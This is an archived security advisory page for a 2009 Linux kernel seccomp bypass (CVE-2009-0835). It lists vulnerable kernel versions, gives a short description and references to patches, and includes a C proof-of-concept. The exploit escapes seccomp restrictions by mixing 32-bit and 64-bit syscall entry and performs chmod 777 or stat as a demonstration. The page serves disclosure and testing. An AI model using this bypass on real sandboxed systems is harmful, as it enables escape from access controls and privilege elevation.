No account yet?
Home » Exploits » Linux Kernel 'seccomp' System Call Security Bypass Vulnerability
Linux Kernel 'seccomp' System Call Security Bypass Vulnerability E-mail
Feeds - Exploits
Written by Chris Evans   
Friday, 13 March 2009 23:59
Linux Kernel 'seccomp' System Call Security Bypass Vulnerability


-\\Bugtraq ID:
33948

-\\Class:
Design Error

-\\CVE:
CVE-2009-0835


-\\Remote:
No

-\\Local:
Yes

-\\Published:
Mar 02 2009 12:00AM

-\\Updated:
Mar 13 2009 05:16PM

-\\Credit:
Chris Evans



-\\Vulnerable:
Linux kernel 2.6.28 6
Linux kernel 2.6.28 5
Linux kernel 2.6.28 3
Linux kernel 2.6.28 2
Linux kernel 2.6.28 1
Linux kernel 2.6.28 -rc7
Linux kernel 2.6.28 -rc5
Linux kernel 2.6.28 -rc1
Linux kernel 2.6.28 -git7
Linux kernel 2.6.28
Linux kernel 2.6.27 6
Linux kernel 2.6.27 3
Linux kernel 2.6.27 14
Linux kernel 2.6.27 13
Linux kernel 2.6.27 12
Linux kernel 2.6.27 12
Linux kernel 2.6.27 .8
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 -rc8-git5
Linux kernel 2.6.27 -rc8
Linux kernel 2.6.27 -rc6-git6
Linux kernel 2.6.27 -rc6
Linux kernel 2.6.27 -rc5
Linux kernel 2.6.27 -rc2
Linux kernel 2.6.27 -rc1
Linux kernel 2.6.27
Linux kernel 2.6.26 7
Linux kernel 2.6.26 4
Linux kernel 2.6.26 3
Linux kernel 2.6.26 .6
Linux kernel 2.6.26 -rc6
Linux kernel 2.6.26
Linux kernel 2.6.25 19
Linux kernel 2.6.25 .9
Linux kernel 2.6.25 .8
Linux kernel 2.6.25 .7
Linux kernel 2.6.25 .6
Linux kernel 2.6.25 .5
Linux kernel 2.6.25 .15
Linux kernel 2.6.25 .13
Linux kernel 2.6.25 .12
Linux kernel 2.6.25 .11
Linux kernel 2.6.25 .10
Linux kernel 2.6.25
Linux kernel 2.6.25
Linux kernel 2.6.24 .2
Linux kernel 2.6.24 .1
Linux kernel 2.6.24 -rc5
Linux kernel 2.6.24 -rc4
Linux kernel 2.6.24 -rc3
Linux kernel 2.6.24 -git13
Linux kernel 2.6.24
Linux kernel 2.6.23 .7
Linux kernel 2.6.23 .6
Linux kernel 2.6.23 .5
Linux kernel 2.6.23 .4
Linux kernel 2.6.23 .3
Linux kernel 2.6.23 .2
Linux kernel 2.6.23 -rc2
Linux kernel 2.6.23 -rc1
Linux kernel 2.6.23
Linux kernel 2.6.22 7
Linux kernel 2.6.22 1
Linux kernel 2.6.22 .8
Linux kernel 2.6.22 .6
Linux kernel 2.6.22 .5
Linux kernel 2.6.22 .4
Linux kernel 2.6.22 .3
Linux kernel 2.6.22 .17
Linux kernel 2.6.22 .16
Linux kernel 2.6.22 .15
Linux kernel 2.6.22 .14
Linux kernel 2.6.22 .13
Linux kernel 2.6.22 .12
Linux kernel 2.6.22 .11
Linux kernel 2.6.22
Linux kernel 2.6.22
Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.21
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20 -git5
Linux kernel 2.6.20
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.20
Linux kernel 2.6.19 1
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19 -rc4
Linux kernel 2.6.19 -rc3
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc2
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc1
Linux kernel 2.6.19
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .1
Linux kernel 2.6.18
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17 -rc5
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.17
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .1
Linux kernel 2.6.16 -rc1
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.16
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15 -rc3
Linux kernel 2.6.15 -rc2
Linux kernel 2.6.15 -rc1
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
Linux kernel 2.6.15
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14 -rc4
Linux kernel 2.6.14 -rc3
Linux kernel 2.6.14 -rc2
Linux kernel 2.6.14 -rc1
Linux kernel 2.6.14
Linux kernel 2.6.14
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13 -rc7
Linux kernel 2.6.13 -rc6
Linux kernel 2.6.13 -rc4
Linux kernel 2.6.13 -rc1
Linux kernel 2.6.13
Linux kernel 2.6.13
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12 -rc5
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.12 -rc1
Linux kernel 2.6.12
Linux kernel 2.6.12
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
Linux kernel 2.6.11
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel  2.6.8.1
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel  2.6.29-rc2-git1
Linux kernel  2.6.29-rc2
Linux kernel  2.6.28.4
Linux kernel  2.6.26.1
Linux kernel  2.6.26-rc5-git1
Linux kernel  2.6.25.4
Linux kernel  2.6.25.3
Linux kernel  2.6.25.2
Linux kernel  2.6.25.1
Linux kernel  2.6.24.6
Linux kernel  2.6.24-rc2
Linux kernel  2.6.24-rc1
Linux kernel  2.6.23.14
Linux kernel  2.6.23.10
Linux kernel  2.6.23.1
Linux kernel  2.6.23.09
Linux kernel  2.6.22-rc7
Linux kernel  2.6.22-rc1
Linux kernel  2.6.21-RC6
Linux kernel  2.6.21-RC5
Linux kernel  2.6.21-RC4
Linux kernel  2.6.21-RC3
Linux kernel  2.6.21-RC3
Linux kernel  2.6.20.3
Linux kernel  2.6.20.2
Linux kernel  2.6.20.13
Linux kernel  2.6.20.11
Linux kernel  2.6.20.1
Linux kernel  2.6.20-rc2
Linux kernel  2.6.20-2
Linux kernel  2.6.18-8.1.8.el5
Linux kernel  2.6.18-53
Linux kernel  2.6.18
Linux kernel  2.6.15.5
Linux kernel  2.6.15.11
Linux kernel  2.6.15-27.48
Linux kernel  2.6.11.4



-\\Discussion
The Linux kernel is prone to a local security-bypass vulnerability.

A local attacker may be able to exploit this issue to bypass access control and make restricted system calls, which may result in an elevation of privileges.



-\\Exploit(s)/PoC(s):
The following example exploit is available:

===============================================================
33948.c
^^^^^^^^
    /* test case for seccomp circumvention on x86-64
       There are two failure modes: compile with -m64 or compile with -m32.

       The -m64 case is the worst one, because it does "chmod 777 ." (could
       be any chmod call).  The -m32 case demonstrates it was able to do
       stat(), which can glean information but not harm anything directly.

       A buggy kernel will let the test do something, print, and exit 1; a
       fixed kernel will make it exit with SIGKILL before it does anything.
    */

    #define _GNU_SOURCE
    #include <assert.h>
    #include <inttypes.h>
    #include <stdio.h>
    #include <linux/prctl.h>
    #include <sys/stat.h>
    #include <unistd.h>
    #include <asm/unistd.h>

    int
    main (int argc, char **argv)
    {
      char buf[100];
      static const char dot[] = ".";
      long ret;
      unsigned st[24];
      if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
        perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
    #ifdef __x86_64__
      assert ((uintptr_t) dot < (1UL << 32));
      asm ("int $0x80 # %0 <- %1(%2 %3)"
           : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      ret = snprintf (buf, sizeof buf,
              "result %ld (check mode on .!)\n", ret);
    #elif defined __i386__
      asm (".code32\n"
           "pushl %%cs\n"
           "pushl $2f\n"
           "ljmpl $0x33, $1f\n"
           ".code64\n"
           "1: syscall # %0 <- %1(%2 %3)\n"
           "lretl\n"
           ".code32\n"
           "2:"
           : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      if (ret == 0)
        ret = snprintf (buf, sizeof buf,
                "stat . -> st_uid=%u\n", st[7]);
      else
        ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
    #else
    # error "not this one"
    #endif
      write (1, buf, ret);

      syscall (__NR_exit, 1);
      return 2;
    }




-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: This e-mail address is being protected from spambots. You need JavaScript enabled to view it .



-\\References(s)
--Bug 487255 -  kernel: x86-64: seccomp: 32/64 syscall hole  
https://bugzilla.redhat.com/show_bug.cgi?id=48725  (Eugene Teo)
--[PATCH 0/2] x86-64: 32/64 syscall arch holes
http://lkml.org/lkml/2009/2/27/45  (Roland McGrath)
--[PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
http://lkml.org/lkml/2009/2/27/45  (Roland McGrath)
--CESA-2009-001 - rev 1: Linux syscall interception technologies partial bypass
http://scary.beasts.org/security/CESA-2009-001.htm  (Chris Evans)
--CESA-2009-004 - rev 1: Linux kernel 'seccomp' facility minor vulnerability
http://scary.beasts.org/security/CESA-2009-004.htm  (Chris Evans)
--Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
http://lkml.org/lkml/2009/2/28/2  (Roland McGrath)
--Problems with syscall filtering technologies on Linux
http://www.securityfocus.com/archive/1/50037  (Chris Evans < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff